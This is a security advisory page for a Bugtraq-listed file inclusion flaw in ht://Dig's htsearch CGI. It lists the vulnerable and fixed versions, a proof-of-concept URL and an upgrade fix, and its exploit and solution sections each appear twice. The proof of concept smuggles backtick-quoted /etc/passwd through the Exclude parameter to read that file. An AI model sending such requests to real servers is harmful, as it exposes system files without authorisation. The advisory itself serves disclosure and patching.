ht://dig Arbitrary File Inclusion Vulnerability
BID:1026
Info
ht://dig Arbitrary File Inclusion Vulnerability
| Bugtraq ID: | 1026 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Feb 29 2000 12:00AM |
| Updated: | Feb 29 2000 12:00AM |
| Credit: | Posted to Bugtraq on February 29, 2000 by Geoff Hutchison <[email protected]>. |
| Vulnerable: |
The ht://Dig Group ht://Dig 3.2 .0b1 The ht://Dig Group ht://Dig 3.1.4 The ht://Dig Group ht://Dig 3.1.3 The ht://Dig Group ht://Dig 3.1.2 The ht://Dig Group ht://Dig 3.1.1 |
| Not Vulnerable: |
The ht://Dig Group ht://Dig 3.2 .0b2 The ht://Dig Group ht://Dig 3.1.5 |
Exploit / POC
ht://dig Arbitrary File Inclusion Vulnerability
The URL:
http ://target/cgi-bin/htsearch?Exclude=%60/etc/passwd%60
will return a page with the contents of /etc/passwd in the 'exclude' field.
The URL:
http ://target/cgi-bin/htsearch?Exclude=%60/etc/passwd%60
will return a page with the contents of /etc/passwd in the 'exclude' field.
Solution / Fix
ht://dig Arbitrary File Inclusion Vulnerability
Solution:
ht://dig version 3.1.5 is fixed, and is available at:
http://www.htdig.org/files/htdig-3.1.5.tar.gz
The fixed beta version, 3.2.0b2, should be available shortly. Check ht://dig's webpage at:
http://www.htdig.org/
for more information.
Solution:
ht://dig version 3.1.5 is fixed, and is available at:
http://www.htdig.org/files/htdig-3.1.5.tar.gz
The fixed beta version, 3.2.0b2, should be available shortly. Check ht://dig's webpage at:
http://www.htdig.org/
for more information.